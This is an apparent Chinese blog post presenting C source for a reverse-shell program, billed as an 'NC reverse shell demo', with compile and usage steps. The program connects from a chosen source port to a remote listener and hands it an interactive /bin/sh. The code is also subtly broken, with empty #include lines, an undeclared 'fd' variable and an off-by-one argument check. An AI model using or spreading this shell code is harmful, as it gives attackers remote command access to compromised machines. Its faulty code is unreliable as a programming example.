一个有趣的NC反弹shell的demo
#include #include #include #include #include void error(char *msg) { perror(msg); exit(0); } int main(int argc,char *argv[]) { int sockfd,portno,lportno,n; struct sockaddr_in serv_addr; struct sockaddr_in client_addr; struct hostent *server; char buffer[256]; if (argc < 3) { fprintf(stderr,"usage %s hostname port LocalPortn",argv[0]); exit(0); } //三个参数,目标主机,目标主机端口,本地源端口 portno = atoi(argv[2]); sockfd = socket(AF_INET,SOCK_STREAM,0); if (sockfd < 0) error("ERROR opening socket"); bzero((char *) &client_addr,sizeof(client_addr)); lportno = atoi(argv[3]); client_addr.sin_family = AF_INET; client_addr.sin_addr.s_addr = INADDR_ANY; client_addr.sin_port = htons(lportno); //设置源端口 if (bind(sockfd,(struct sockaddr *) &client_addr,sizeof(client_addr)) < 0) error("ERROR on binding"); server = gethostbyname(argv[1]); if (server == NULL) { fprintf(stderr,"ERROR,no such host "); exit(0); } bzero((char *) &serv_addr,sizeof(serv_addr)); serv_addr.sin_family = AF_INET; bcopy((char *)server->h_addr,(char *)&serv_addr.sin_addr.s_addr,server->h_length); serv_addr.sin_port = htons(portno); if (connect(sockfd,&serv_addr,sizeof(serv_addr)) < 0) //连接 error("ERROR connecting"); dup2(fd,0); dup2(fd,1); dup2(fd,2); execl("/bin/sh","sh -i",NULL); //执行shell close(fd); }
编译后执行时候
gcc client-port.c -o port chmod +x port ./port 你的IP 你的监听端口 本地的源端口
eg
./port 111.111.111.111 80 80